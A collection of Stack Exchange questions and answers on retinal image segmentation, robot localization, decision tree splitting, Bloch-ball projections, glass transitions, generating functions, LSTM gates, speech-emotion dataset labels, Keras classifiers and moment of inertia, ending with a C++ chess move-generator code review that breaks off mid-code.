Question: I have an image like the one above, and what I need to find are the red circled areas. They are caused by how the nerve layer lies in the eye, and I have no idea what method to use to extract them. (I am looking for a brighter background from the nerve layer.) I have found all the blood vessels, so I can ignore those areas easily. But I don't have any concept of how to begin the search for these areas. Note that the bright spots on the top right side (let's say 12 o'clock / 1 o'clock from the image center) are not caused by the nerve layer, but by this being a young person's eye. Can someone point me to a method to extract these areas? Note that the areas could also be non-existent, or be formed like a cross or like an hourglass. Answer: It is going to be a tough task, and you may not achieve a fully automated process. Here are some building blocks that you could try: Enhance the contrast of the image so that you can clearly distinguish all the features by looking at the image. Here is a link to an algorithm that shows good results. In this enhanced image, extract the edges (using, for example, a standard Canny-Deriche edge detector). From the edge detector output, you can start adding the required application logic in order to keep the desired features: size or length criteria, linear-feature extraction, etc.
{ "domain": "dsp.stackexchange", "id": 859, "tags": "image-segmentation" }
How do you deal with the "Kidnapped robot problem"
Question: Having a map, and the robot "waking up" at an unknown position, what methods are currently used to recover the position? Originally posted by Mehdi. on ROS Answers with karma: 3339 on 2015-02-15 Post score: 0 Answer: Usually the two main approaches are the Kalman filter and the particle filter. I implemented a particle filter in the past and it gave very good results. Hope this helps, Originally posted by marguedas with karma: 3606 on 2015-02-17 This answer was ACCEPTED on the original site Post score: 0
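For a flavour of the particle-filter approach, here is a deliberately tiny 1-D sketch (not ROS code; all numbers are made up for illustration): the robot wakes up somewhere in a 10 m corridor, repeatedly measures a noisy range to a beacon at x = 0, and the initially uniform particle cloud collapses onto the true position after a few motion/measurement cycles:

```python
import math
import random
import statistics

def localize(true_x, n_particles=2000, steps=8, seed=0):
    """Toy 1-D global localization with a particle filter."""
    rng = random.Random(seed)
    sigma = 0.3                                 # range-sensor noise (std dev)
    # "Kidnapped": no idea where we are, so particles are uniform on the corridor.
    particles = [rng.uniform(0.0, 10.0) for _ in range(n_particles)]
    x = true_x
    for _ in range(steps):
        # Motion update: robot drives +0.5 m; particles move likewise, with jitter.
        x += 0.5
        particles = [p + 0.5 + rng.gauss(0.0, 0.05) for p in particles]
        # Measurement update: weight particles by likelihood of the observed range.
        z = x + rng.gauss(0.0, sigma)           # noisy range to the beacon at 0
        weights = [math.exp(-0.5 * ((z - p) / sigma) ** 2) for p in particles]
        # Resample in proportion to the weights.
        particles = rng.choices(particles, weights=weights, k=n_particles)
    return statistics.fmean(particles)

est = localize(true_x=3.0)
print(est)  # close to 7.0 (started at 3.0, then drove 8 x 0.5 m)
```

This is the same uniform-initialisation trick that AMCL's global localization mode uses on a real 2-D occupancy grid map.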
{ "domain": "robotics.stackexchange", "id": 20887, "tags": "ros, mapping, 3d-slam" }
Mathematical calculation behind decision tree classifier with continuous variables
Question: I am working on a binary classification problem having continuous variables (gene expression values). My goal is to classify the samples as case or control using the gene expression values (from Gene-A, Gene-B and Gene-C) with a decision tree classifier. I am using the entropy criterion for node splitting and am implementing the algorithm in Python. The classifier is easily able to differentiate the samples. Below is the sample data. Sample training set with labels (Gene-A, Gene-B, Gene-C, label): (1, 0, 38, Case); (0, 7, 374, Case); (1, 6, 572, Case); (0, 2, 538, Control); (33, 5, 860, Control). Sample testing set with labels: (1, 6, 394, Case); (13, 4, 777, Control). I have gone through a lot of resources and have learned how to mathematically calculate Gini impurity, entropy and information gain. I am not able to comprehend how the actual training and testing work. It would be really helpful if someone could show the calculation for training and testing with my sample datasets or provide an online resource. Answer: Of course, it depends on what algorithm you use. Typically, a top-down algorithm is used. You gather all the training data at the root. The base decision is going to be whatever class you have most of. Now, we see if we can do better. We consider all possible splits. For categorical variables, every value gets its own node. For continuous variables, we can use any possible midpoint between two values (if the values were sorted). For your example, possible splits are Gene-A < 0.5, Gene-A < 17, Gene-B < 1, Gene-B < 3.5, and so on. There is a total of 10 possible splits. For each of those candidate splits, we measure how much the entropy decreases (or whatever criterion we selected) and, if this decrease looks significant enough, we introduce this split. For example, our entropy in the root node is $-0.4 \log_2 0.4 - 0.6 \log_2 0.6 \approx 0.97$. 
If we introduce the split Gene-A < 0.5, we get one leaf with entropy $1$ (with 2 data points in it), and one leaf with entropy $0.918$ (with 3 data points). The total decrease of entropy is $0.97 - (\frac25 \times 1 + \frac35 \times 0.918) \approx 0.02$. For the split Gene-A < 17 we get a decrease of entropy of about $0.3219$. The best splits for the root are Gene-B < 5.5 and Gene-C < 456. These both reduce the entropy by about $0.42$, which is a substantial improvement. When you choose a split, you introduce a leaf for the possible outcomes of the test. Here it's just 2 leaves: "yes, the value is smaller than the threshold" or "no, it is not smaller". In every leaf, we collect the training data from the parent that corresponds to this choice. So, if we select Gene-B < 5.5 as our split, the "yes" leaf will contain the first, fourth and fifth data points, and the "no" leaf will contain the other data points. Then we continue, by repeating the process for each of the leaves. In our example, the "yes" branch can still be split further. A good split would be Gene-C < 288, which results in pure leaves (they have 0 entropy). When a leaf is "pure enough" (it has very low entropy) or we don't think we have enough data, or the best split for a leaf is not a significant improvement, or we have reached a maximum depth, you stop the process for that leaf. In this leaf you can store the count for all the classes you have in the training data. If you have to make a prediction for a new data point (from the test set), you start at the root and look at the test (the splitting criterion). For example, for the first test point, we have that Gene-B < 5.5 is false, so we go to the 'no' branch. You continue until you get to a leaf. In a leaf, you would predict whatever class you have most of. If the user wants, you can also output a probability by giving the proportion. 
For the first test point, we go to the "no" branch of the first test, and we end up in a leaf; our prediction would be "Case". For the second test point, we go to the "yes" branch of the first test. Here we test whether 777 < 288, which is false, so we go to the "no" branch, and end up in a leaf. This leaf contains only "Control" cases, so our prediction would be "Control".
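The numbers in this walkthrough are easy to reproduce. A short sketch with the five training rows hard-coded:

```python
import math

data = [  # (Gene-A, Gene-B, Gene-C, label)
    (1, 0, 38, 'Case'), (0, 7, 374, 'Case'), (1, 6, 572, 'Case'),
    (0, 2, 538, 'Control'), (33, 5, 860, 'Control'),
]

def entropy(labels):
    if not labels:
        return 0.0
    n = len(labels)
    return -sum((labels.count(c) / n) * math.log2(labels.count(c) / n)
                for c in set(labels))

def info_gain(feature, threshold):
    """Entropy decrease for the candidate split data[feature] < threshold."""
    parent = [row[-1] for row in data]
    yes = [row[-1] for row in data if row[feature] < threshold]
    no = [row[-1] for row in data if row[feature] >= threshold]
    n = len(parent)
    return (entropy(parent)
            - len(yes) / n * entropy(yes)
            - len(no) / n * entropy(no))

print(round(entropy([r[-1] for r in data]), 2))  # 0.97  (root entropy)
print(round(info_gain(0, 0.5), 2))               # 0.02  (Gene-A < 0.5)
print(round(info_gain(0, 17), 2))                # 0.32  (Gene-A < 17)
print(round(info_gain(1, 5.5), 2))               # 0.42  (Gene-B < 5.5)
```

Looping info_gain over all 10 candidate thresholds reproduces the split selection described above.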
{ "domain": "ai.stackexchange", "id": 2267, "tags": "machine-learning, math, decision-trees" }
Does this point-projection of a mixed state onto a pure state appear in the quantum information theory literature?
Question: In my research, I stumbled on a smooth map: $$\pi_{\rho_0}: B \setminus \{\rho_0\} \to \partial B$$ where $B$ is the open Bloch ball, corresponding to the set of mixed states of a single qubit and $\partial B$ is the Bloch sphere proper, consisting of the set of pure states of a single qubit and $\rho_0 \in B$ is a fixed mixed state of a single qubit. The map is defined as follows. After fixing $\rho_0 \in B$, you define the image of a mixed state $\rho \in B$, $\rho \neq \rho_0$ as the intersection of the ray starting from $\rho_0$ and passing through $\rho$ with $\partial B$ (the Bloch sphere proper). This can be characterized as follows. It is the unique pure state which can be written as a linear combination $$a \rho_0 + b \rho$$ where $a, b \in \mathbb{R}$ such that $a + b = 1$ and $b > 1$ (and therefore $a < 0$). Note that $\pi$ can be viewed as a map $$ B \times B \setminus \Delta \to \partial B $$ mapping $(\rho_0, \rho)$ to $\pi_{\rho_0}(\rho)$, where $\Delta \subset B \times B$ is the diagonal (i.e. $\Delta$ consists of all pairs $(\rho, \rho)$ such that $\rho \in B$). Then, if $G = \mathrm{SU}(2)$, $G$ acts on $B \times B$ by $$ g.(\rho_0, \rho) := (g \rho_0 g^{-1}, g \rho g^{-1}). $$ Moreover, $G$ acts on $\partial B$ by $$ g.\nu = g \nu g^{-1}.$$ Then, if I am not mistaken, $\pi$ is $G$-equivariant. This map $\pi$ seems natural. I know it appears in the literature when $\rho_0 = \frac{1}{2}I$ is at the "origin" of the Bloch ball. But did the more general $\pi_{\rho_0}$, where $\rho_0$ is any fixed mixed state of the qubit, appear in the quantum information theory literature please? I would like to investigate whether there may be a link between a problem in geometry that I am interested in and quantum information theory. Answer: I am not aware of a direct application of this projection. However, maybe the following geometrical construction is nevertheless of interest to you. 
Similar ray constructions appear in resource theories, namely in the definition of robustness and generalised robustness monotones. Consider a convex set of states $\mathcal{F}$ which we call the free states in the resource theory. Let us denote by $\mathcal{S}$ the convex set of all states. Then, given a state $\rho$ we define the following functions $$ R(\rho) = \inf\big\{ t\geq 0 \; | \; \rho = (1+t)\sigma_0 - t \sigma_1 \text{ for } \sigma_0,\sigma_1\in\mathcal{F} \big\}, $$ $$ GR(\rho) = \inf\big\{ t\geq 0 \; | \; \rho = (1+t)\sigma_0 - t \sigma_1 \text{ for } \sigma_0\in\mathcal{F}, \sigma_1\in\mathcal{S} \big\}. $$ In the definitions, we optimise over all rays going through $\mathcal{F}$ which include $\rho$. If $\rho$ is pure, then $\rho$ is the projection of $\sigma_1$ w.r.t. $\sigma_0$ under your map. The monotones have the following geometrical interpretation: For $R$: $\sigma_0$ is the closest state in $\mathcal{F}$ to $\rho$ measured w.r.t. the length of the ray segment which lies in $\mathcal{F}$ (the diameter of $\mathcal{F}$ in this direction) For $GR$: similar, but compared to the distance of $\sigma_0$ to the opposite boundary of $\mathcal{S}$. The generalised robustness is equivalent to what is called the max-relative entropy $$ \mathcal{D}_\mathrm{max}(\rho) := \inf_{\sigma\in\mathcal{F}} D_\mathrm{max}(\rho||\sigma) = \log\left( 1 + GR(\rho) \right) $$ where $D_\mathrm{max}(\rho||\sigma)=\log \inf\{\lambda\geq 0 \, | \, \rho \leq \lambda\sigma\}$. After your remark, I changed $\min$ to $\inf$. However, $\mathcal{F}$ is usually compact. Here is a review on resource theories which appeared recently in RMP. The above functions and more appear in Sec. VI. Chitambar and Gour: "Quantum Resource Theories". https://arxiv.org/abs/1806.06107
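Returning to the map in the question: in Bloch-vector coordinates, $\pi_{\rho_0}$ is just a ray-sphere intersection, which makes it easy to experiment with numerically. A sketch, representing each state by its Bloch vector and solving $|r_0 + t(r - r_0)|^2 = 1$ for the root $t > 1$:

```python
import math

def project(r0, r):
    """pi_{rho0}(rho) in Bloch coordinates: where the ray from r0 through r
    meets the unit sphere (requires |r0| < 1, |r| < 1, r != r0)."""
    d = [ri - r0i for ri, r0i in zip(r, r0)]
    a = sum(di * di for di in d)
    b = 2 * sum(di * r0i for di, r0i in zip(d, r0))
    c = sum(r0i * r0i for r0i in r0) - 1.0
    t = (-b + math.sqrt(b * b - 4 * a * c)) / (2 * a)  # larger root; t > 1
    return [r0i + t * di for r0i, di in zip(r0, d)]

# From the maximally mixed state the map is just radial projection:
p = project((0.0, 0.0, 0.0), (0.5, 0.0, 0.0))
print(p)  # [1.0, 0.0, 0.0]

# For a generic base point, the image still lands on the sphere:
q = project((0.2, 0.0, 0.0), (0.2, 0.3, 0.0))
print(sum(x * x for x in q))  # 1.0, up to rounding
```

Since $|r_0| < 1$ makes the constant term of the quadratic negative and $|r| < 1$ makes the value at $t = 1$ negative, the larger root always satisfies $t > 1$, matching the condition $b > 1$, $a < 0$ in the question.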
{ "domain": "quantumcomputing.stackexchange", "id": 2210, "tags": "quantum-state, bloch-sphere" }
how to read emotion label of MSP-IMPROV dataset samples?
Question: I need to read the MSP-IMPROV dataset's audio files to conduct research. I read the help file, which says the 15th character of the file name shows the emotion label of each utterance. For example, MSP-IMPROV-S01A-M01-P-FM01 has intended emotion Angry. But when I run code that follows this rule, I cannot reach the other emotions, which are labeled O (others) and WA (without agreement). Moreover, I must extract Anger (792), Happiness (2644), Sadness (885), Neutral (3477), but I find that the number of each emotion is Anger (2511), Happiness (2267), Sadness (2035), Neutral (1625). Can anyone help me find out where I made a mistake? Thanks in advance. (For more information about this database, see this link and this page.) Answer: I asked Prof. Busso, the leader of the MSP-IMPROV dataset team, about this. He answered: " The intended emotion is included in the file name. The emotion annotated by the workers is provided in the file Evalution.txt. You should not use the intended emotion as the actual emotion. Example: MSP-IMPROV-S01A-M01-P-FM01 intended emotion was anger, but if you see the evaluation you will see the following information: UTD-IMPROV-S01A-M01-P-FM01.avi; N; A:3.666667; V:3.166667; D:2.833333 ; N:4.166667; 51o11nal985p2oq49qmnnqivm2-p3b; Neutral; Neutral; A:3.000000; V:3.000000; D:4.000000; N:4.000000; 6lrk33e18tetg934je64ale7r6-p3b; Neutral; Neutral; A:4.000000; V:3.000000; D:3.000000; N:4.000000; cv970rs8rn8v23p3f3tec5bgb4-p3b; Happy; Happy,Neutral; A:5.000000; V:4.000000; D:3.000000; N:5.000000; n76ifqflrdaao10o0bg8js05o3-p3b; Neutral; Neutral; A:3.000000; V:3.000000; D:2.000000; N:4.000000; puumgduqdt8hfiffuvts8m3241-p3b; Neutral; Neutral; A:4.000000; V:3.000000; D:2.000000; N:4.000000; qlvg8teulu3c7mcgvds07eqte1-p3b; Neutral; Neutral; A:3.000000; V:3.000000; D:3.000000; N:4.000000; This file was annotated as neutral. 
"

So I wrote code for this purpose that reads the file name, finds it in the Evaluation file, and reads the real annotated emotion. This is the main function (please put the MSP database in the "DBs" folder):

function [DB, samplesN, fs] = mspDBread(sesNum)
%%
emoEvl = 'DBs/MSPEvalution.txt';
rootdir = 'DBs/MSP-IMPROV';
sesList = dir(rootdir);
sesList = sesList(3:end);
samplesN = 1;
for iSes = sesNum
    session = sesList(iSes).name;
    sentenceRoot = [rootdir,'/',session];
    sentences = dir(sentenceRoot);
    sentences = sentences(3:end);
    for iSentence = 1:numel(sentences)
        scenarioRoot = [sentenceRoot,'/',sentences(iSentence).name];
        SentName = sentences(iSentence).name;
        scenario = dir(scenarioRoot);
        scenario = scenario(3:end);
        for iScen = 1:numel(scenario)
            fileRoot = [scenarioRoot,'/',scenario(iScen).name];
            fileList = dir(fileRoot);
            fileList = fileList(3:end);
            for iFile = 1:numel(fileList)
                emoList = {};
                i = 1;
                textFileID = fopen(emoEvl);
                tline = fgetl(textFileID);
                while ischar(tline)
                    tline = fgetl(textFileID);
                    if numel(tline) ~= 0
                        if strcmp(tline(1),'U')
                            words = strsplit(tline);
                            destLineHeader = words(1);
                            destLineHeader = destLineHeader{1,1};
                            destLineHeader = destLineHeader(5:end-5);
                            waveFileName = fileList(iFile).name;
                            if strcmp(destLineHeader, waveFileName(5:end-4))
                                emotion = words(2);
                                emotion = emotion{1,1};
                                emotion = emotion(1,1);
                                compRoot = [fileRoot,'/',waveFileName];
                                [x, fs] = audioread(compRoot);
                                DB{samplesN,1}  = samplesN;                         % sample number
                                DB{samplesN,2}  = str2double(session(end));         % session number
                                DB{samplesN,3}  = str2double(waveFileName(13:14));  % sentence number
                                DB{samplesN,4}  = scenarioMap(waveFileName(21));    % scenario type
                                DB{samplesN,5}  = labelMap(emotion);                % emotion label
                                DB{samplesN,6}  = genderMAP(waveFileName(17));      % speaker gender
                                DB{samplesN,7}  = str2double(waveFileName(18:19));  % speaker ID
                                DB{samplesN,8}  = genderMAP(waveFileName(23));      % listener gender 1:male 0:female
                                DB{samplesN,9}  = genderMAP(waveFileName(24));      % speaker gender 1:male 0:female
                                DB{samplesN,10} = str2double(waveFileName(25:26));  % turn number
                                DB{samplesN,11} = waveFileName;                     % complete name of voice
                                DB{samplesN,12} = x;                                % data
                                disp([num2str(samplesN), ' session : ', session(end), ' label:', waveFileName(15), ' detect: ', emotion, ' EmoIndex: ', num2str(labelMap(emotion)), ' ', waveFileName])
                                samplesN = samplesN + 1;
                            end
                        end
                    end
                end
                fclose('all');
            end
        end
    end
end

Other functions used by the main function are listed below.

1. Scenario mapping function:

function [code] = scenarioMap(character)
if character=='T'
    code = 0;
elseif character=='S'
    code = 1;
elseif character=='P'
    code = 2;
elseif character=='R'
    code = 3;
else
    code = 4;
end

2. Label mapping function:

function [code] = labelMap(character)
if character=='A'
    code = 0;
elseif character=='H'
    code = 1;
elseif character=='S'
    code = 2;
elseif character=='N'
    code = 3;
elseif character=='O'
    code = 4;
    disp('--------zzzzzzz-----')
elseif character=='W'
    code = 4;
    disp('--------zzzzzzz-----')
else
    code = 4;
end

3. Gender mapping function:

function [gender] = genderMAP(str)
if strcmp(str,'F')
    gender = 0;
elseif strcmp(str,'M')
    gender = 1;
end
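As a side note, the same lookup can be sketched in a few lines of Python (the parsing logic is language-independent). This is a minimal sketch under assumptions taken from the quoted example: summary lines start with "UTD-", fields are ";"-separated, and the second field is the annotated emotion code. The function name and the "UTD-" to "MSP-" renaming are illustrative, not part of the dataset's official tooling.

```python
def parse_evaluation(text):
    """Map utterance names to annotated emotion codes from Evaluation-style text.

    Assumes each summary line looks like (format taken from the quoted example):
      UTD-IMPROV-S01A-M01-P-FM01.avi; N; A:...; V:...; D:...; N:...;
    where the second field is the annotated emotion code.
    """
    labels = {}
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("UTD-"):
            continue  # skip per-worker detail lines
        fields = [f.strip() for f in line.split(";")]
        # rename to the audio-file prefix and drop the ".avi" extension
        utt = fields[0].replace("UTD-", "MSP-").rsplit(".", 1)[0]
        labels[utt] = fields[1]
    return labels
```

Iterating over this dictionary instead of re-scanning the text file for every audio file also avoids the repeated `fopen`/`fgetl` passes in the MATLAB version.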
{ "domain": "datascience.stackexchange", "id": 7719, "tags": "python, deep-learning, matlab" }
understanding linear algebra of a forget gate
Question: This blog covers the basics of LSTMs. A forget gate is defined as: $$f_t = \sigma(W_f \cdot [h_{t-1}, x_t]+ b_f)$$ At this point the linear algebra confuses me more than it should. The syntax of $W\cdot [h,x]$ is confusing in this context. I think a vector should go into the activation function since the output $f$ is a vector, but the syntax of the forget gate above implies that the input has $2$ columns, because $[h,x]$ will be an $n\times 2$ matrix. For the sake of example, let's say ... \begin{align} W &= \begin{bmatrix} 0 & 1 \\ 2 &3 \end{bmatrix}\\ h &= \begin{bmatrix} -1 \\ 2 \end{bmatrix}\\ x &= \begin{bmatrix} 3 \\ 0 \end{bmatrix}\\ b &= \begin{bmatrix} 1 \\ -2 \end{bmatrix}\end{align} Can anyone give the final vector that goes into the sigmoid function? I think the math is $$ \begin{bmatrix} 0 & 1 \\ 2 & 3 \end{bmatrix}\begin{bmatrix} -3 & 3 \\ 2 & 0 \end{bmatrix} + \begin{bmatrix} 1 \\ -2\end{bmatrix} = \begin{bmatrix} 2 & 0 \\ 4 & 6\end{bmatrix}+ \begin{bmatrix} 1 \\ -2\end{bmatrix} = \text{ Something wrong}$$

Answer: Note that $$[h_{t-1}, x_t]$$ is the concatenation of two vectors. In your example, it would be: $$[h_{t-1}, x_t] = [-1, 2, 3, 0]$$ and then the dimensions of $W_f$ would be $2 \times 4$, where $2$ is the dimension of the output of the LSTM cell, i.e. the activation $h_t$, which you defined to be of dimension $2$. Hence, $$W_f \cdot [h_{t-1}, x_t] $$ is a multiplication of a matrix of dimension $2\times4$ by a vector of dimension $4$, which will return a vector of dimension $2$. And then the sigmoid function will be applied pointwise to each of the two elements of the result. Hope it makes sense.
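To make the dimensions concrete, here is a small Python sketch of the forget gate (plain lists, no framework). Only the $h$, $x$, $b$ values come from the question; the $2\times 4$ weight matrix below is made up for illustration, since with $h$ and $x$ each of dimension 2, $W_f$ must be $2\times 4$, not $2\times 2$.

```python
import math

def sigmoid(z):
    return 1.0 / (1.0 + math.exp(-z))

def forget_gate(W, h_prev, x_t, b):
    """f_t = sigmoid(W . [h_prev, x_t] + b), where [.,.] is concatenation."""
    v = h_prev + x_t  # list concatenation: a single vector of length 4 here
    return [sigmoid(sum(W[i][j] * v[j] for j in range(len(v))) + b[i])
            for i in range(len(W))]

# Hypothetical 2x4 weight matrix; h, x, b as in the question.
W = [[0, 1, 1, 0],
     [2, 3, 0, 1]]
h = [-1, 2]
x = [3, 0]
b = [1, -2]
f = forget_gate(W, h, x, b)  # a length-2 vector, each entry in (0, 1)
```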
{ "domain": "datascience.stackexchange", "id": 4761, "tags": "neural-network, lstm, rnn" }
How to calculate the moment of inertia of a 2 point mass system
Question: I have 2 point masses $m_1$ and $m_2$ connected via a massless rigid rod to a center. $m_1$ is at distance $r_1$ from the center and $m_2$ is at distance $r_2$ from the center. How would I calculate the moment of inertia of the system? Answer: It is the sum of the point-mass moments of inertia: $$I=\sum_i m_ir_i^2 = m_1r_1^2+m_2r_2^2+...$$
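The sum above is simple enough to check with a few lines of Python (the function name is just for illustration):

```python
def moment_of_inertia(masses, radii):
    """I = sum_i m_i * r_i**2 for point masses rotating about the center."""
    return sum(m * r * r for m, r in zip(masses, radii))

# e.g. m1 = 2 kg at r1 = 1 m and m2 = 3 kg at r2 = 2 m:
I = moment_of_inertia([2.0, 3.0], [1.0, 2.0])  # 2*1^2 + 3*2^2 = 14 kg m^2
```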
{ "domain": "physics.stackexchange", "id": 27753, "tags": "homework-and-exercises, moment-of-inertia" }
Obtaining a recurrence from a rational generating function
Question: Looking at some generating functions of series, I have conjectured: if $G(x) \ =\ \frac{1}{1-x^{t_1}-x^{t_2}-...-x^{t_n}}$, then the recurrence equation of the series is $a_n = a_{n-t_1}+a_{n-t_2}+...+a_{n-t_n}$. How can I prove or disprove this? Answer: Suppose that $$ G(x) = \sum_{n=0}^\infty g_n x^n. $$ Using the given equation (ending at $i_m$, a better choice of variables), we have $$ 1 = (1-x^{i_1}-\cdots-x^{i_m}) G(x) = \sum_{n=0}^\infty (1-x^{i_1}-\cdots-x^{i_m}) g_n x^n = \\ \sum_{n=0}^\infty g_n x^n - \sum_{n=i_1}^\infty g_{n-i_1} x^n - \cdots - \sum_{n=i_m}^\infty g_{n-i_m} x^n = \\ \sum_{n=i_m}^\infty (g_n - g_{n-i_1} - \cdots - g_{n-i_m}) x^n - H(x), $$ where $\deg H(x) < i_m$. Comparing coefficients, we find out that for $n \geq i_m$, $$ g_n = g_{n-i_1} + \cdots + g_{n-i_m}. $$ More generally, you could have allowed coefficients in front of the monomials.
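The comparison of coefficients can also be checked numerically. The sketch below (Python, illustrative) inverts the denominator as a formal power series, using exactly the "coefficient of $x^n$ in $\mathrm{den}\cdot G$ must be $0$" condition from the answer; the resulting coefficients then satisfy the conjectured recurrence. For $t_i \in \{1, 2\}$ the coefficients are the Fibonacci numbers.

```python
def inverse_series(den, n_terms):
    """Coefficients of 1/den(x) as a formal power series (den[0] must be 1).

    den is the coefficient list of the denominator, e.g. [1, -1, -1]
    represents 1 - x - x^2.
    """
    g = [0] * n_terms
    g[0] = 1
    for n in range(1, n_terms):
        # coefficient of x^n in den(x) * G(x) must vanish
        g[n] = -sum(den[k] * g[n - k] for k in range(1, min(n, len(den) - 1) + 1))
    return g

fib = inverse_series([1, -1, -1], 8)  # -> [1, 1, 2, 3, 5, 8, 13, 21]
```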
{ "domain": "cs.stackexchange", "id": 10766, "tags": "combinatorics, recurrence-relation, generating-functions" }
nature of glass transition
Question: I am reading in some book: "The glass transition is similar in appearance to a second-order phase transition, but it is not a true thermodynamic phase transition. This is because the transition temperature depends on the rate at which we do the experiment." What's the matter with that rate? Is it only a question of the mathematical definition of a thermodynamic phase, or is there a physical reason to exclude rate-dependent transitions? Answer: Thermodynamic phase transitions are defined as discontinuities in (derivatives of) the free energy. Thus, they are about differences in equilibrium properties, even though often we end up measuring a non-equilibrium property because it's easier. But nowhere in this framework does a rate-dependent, i.e. non-equilibrium, situation occur, and therefore the glass transition is not a "proper" phase transition in that sense.
{ "domain": "physics.stackexchange", "id": 2774, "tags": "thermodynamics, definition, phase-transition, amorphous-solids, glass" }
TF Keras: How to turn this probability-based classifier into single-output-neuron label-based classifier
Question: Here's a simple image classifier implemented in TensorFlow Keras (right click to open in new tab): https://colab.research.google.com/github/tensorflow/docs/blob/master/site/en/tutorials/quickstart/advanced.ipynb

I altered it a bit to fit my 2-class dataset, and the output layer is:

Dense(2, activation=tf.nn.softmax);

The loss function and optimiser are still the same as in the example in the link above:

loss_fn = tf.losses.SparseCategoricalCrossentropy();
optimizer = tf.optimizers.Adam();

I wish to turn it into a classifier with a single output neuron, as I have only 2 classes in the dataset and sigmoid handles 2 classes well. I tried some combinations of output activation functions + loss functions + optimisers, but the network doesn't work any more (i.e. it doesn't converge). For example, this doesn't work:

//output layer
Dense(1, activation=tf.sigmoid);
//loss and optim
loss_fn = tf.losses.mse;
optimizer = tf.optimizers.Adagrad(1e-1);

Which combination of output activation + loss + optimiser should work for the single-output-neuron model? And generically, which loss functions and optimisers pair well?

Answer: As Neil advised: yes, output targeting class labels is still classification.

Output in a contiguous numeric range: this is regression. For example, linear activation, which has the full numeric range of outputs.

Output targeting class labels: this is classification. Either:
- A single output neuron with a sigmoid-like function. This classifies 2 classes, although the Y data can be normalised to classify more classes.
- Multiple output neurons (probabilities of classes) with sigmoid-like functions (softmax is mainly used). This classifies 2 or more classes.

Multiple combinations of loss functions and optimisers can make the single-neuron output layer work, with different configs for them. Note that the learning rates of different optimisers differ; some take 1e-1, some need 1e-3 for good training.
For example, this combination should work:

loss_fn = tf.losses.LogCosh();
optimizer = tf.optimizers.RMSprop(1e-3);

From my trying out, these other combinations also work for a single output neuron with my data (Adam, Adamax, Nadam, and RMSprop work when learning_rate=1e-3 instead of 1e-1):

| Loss | Adadelta | Adagrad | Adam | Adamax | Ftrl | Nadam | RMSprop | SGD |
|---|---|---|---|---|---|---|---|---|
| BinaryCrossentropy | Yes | Yes | -- | -- | -- | -- | -- | Yes |
| CategoricalCrossentropy | Yes | -- | -- | -- | -- | -- | -- | -- |
| CategoricalHinge | -- | -- | -- | -- | -- | -- | -- | -- |
| CosineSimilarity | -- | -- | -- | -- | -- | -- | -- | -- |
| Hinge | Yes | Yes | -- | -- | -- | -- | -- | Yes |
| Huber | Yes | Yes | -- | -- | -- | -- | -- | Yes |
| LogCosh | Yes | Yes | -- | -- | -- | -- | -- | Yes |
| Poisson | Yes | Yes | -- | -- | -- | -- | -- | Yes |
| SquaredHinge | Yes | Yes | -- | -- | -- | -- | -- | Yes |

KLD: lambda a,b: KLD(a,b)
MAE, MAPE, MSE, MSLE: lambda a,b: Mxxx(a,b)

The above lambdas are direct functions, not classes like SGD, Adadelta, etc. SparseCategoricalCrossentropy seems not to work with a single output neuron.
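One way to see why the single sigmoid neuron is an adequate replacement for the 2-neuron softmax: for any logit $z$, a softmax over $[z, 0]$ assigns the first class exactly the probability $\sigma(z)$, so the two output heads describe the same probability model. The check below uses plain Python rather than TensorFlow, so no specific Keras API is assumed.

```python
import math

def sigmoid(z):
    return 1.0 / (1.0 + math.exp(-z))

def softmax(zs):
    m = max(zs)  # subtract the max for numerical stability
    exps = [math.exp(z - m) for z in zs]
    s = sum(exps)
    return [e / s for e in exps]

# softmax([z, 0])[0] = e^z / (e^z + 1) = 1 / (1 + e^-z) = sigmoid(z)
for z in (-3.0, -0.5, 0.0, 1.7, 4.2):
    assert abs(softmax([z, 0.0])[0] - sigmoid(z)) < 1e-12
```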
{ "domain": "ai.stackexchange", "id": 1416, "tags": "classification, tensorflow, keras, objective-functions, regression" }
Chess engine for C++
Question:

Basic Description

What is the program for?
This is just a hobby project for me to improve at coding, not a serious one.

What does the program do?
It can take a chess position (not including variants like chess960, etc.) and generate all legal moves from it. Draw and checkmate detection are not added yet.

File and function description

main.cpp/hpp - Currently only used for testing
Note: The functions here are just for debugging, thus don't matter much. Any feedback on how to write better code here is still appreciated though.
- perft()/perftDivide(): Perft test to check the move generation function.
- printStateTest(): Only used for debugging; prints the gameState.

gameState.cpp/hpp - Basic board handling
- gameState: Game state class.
- addPiece()/deletePiece()/movePieceFromPos(): Pretty self-explanatory.
- initWithFEN(): Initialize game state with FEN notation.
- isSameColor()/isSameType(): Compare the color/type of two pieces.
- oppositeColor(): Make the piece an opponent's piece.

piece.hpp - Defines the enum values of the pieces

move.cpp/hpp - Move handling
- pieceMove: Move class.
- initMove(): Initialize pieceMove.
- applyMove(): Makes a move and updates the game state accordingly.
- cordAlgebraicToNum(): Converts an algebraic coordinate to the internal numeric format.
- cordNumToAlgebraic(): Opposite of the function above.
- moveToUCI(): Converts a piece move to UCI format.

moveGen.cpp/hpp - Move generation
- isInCheck(): Check if the selected side is in check. Doesn't use the function below, to increase performance.
- generatePseudoMoves(): Generate pseudo-legal moves.
- generateLegalMoves(): Filter legal moves from the function above.
- generateSlidingMoves(): Generate directional moves with specified depth.
- easyMask(): Generate move mask (see below).
- moveCanBeMade(): Testing if a move can be made without crossing the edge of the board.

What do I plan to add in the future?
- Positional evaluation
- AI engine

What do I wish to improve?
As I plan to implement more features to the code, I'm looking for ways to improve the structure and performance of it. (e.g. Better algorithms, code style...) Any sort of help is appreciated, and thanks in advance! The Code main.cpp #include <iostream> #include <vector> #include <string> #include <map> #include "gameState.hpp" #include "pieces.hpp" #include "move.hpp" #include "moveGen.hpp" #include "main.hpp" std::map<std::string, int> perftDivide (gameState currentState, int depth) { std::map<std::string, int> output; int sideToMove = currentState.whiteToMove ? COLOR_WHITE : COLOR_BLACK; std::vector<pieceMove> moveList = generateLegalMoves(currentState, sideToMove); for (int i = 0; i < moveList.size(); ++i) { output[moveToUCI(moveList[i])] = perft(applyMove(currentState, moveList[i]), depth - 1); } return output; } int perft (gameState currentState, int depth) { int sideToMove = currentState.whiteToMove ? COLOR_WHITE : COLOR_BLACK; std::vector<pieceMove> moveList = generateLegalMoves(currentState, sideToMove); int positionNum = 0; if (depth == 0) { return 1; } if (depth == 1) { return moveList.size(); } for (int i = 0; i < moveList.size(); ++i) { positionNum += perft(applyMove(currentState, moveList[i]), depth - 1); } return positionNum; } void printStateTest(gameState test) { //Temp function for printing class gameState std::map<int, char> pieces = { {9, 'P'}, {10, 'N'}, 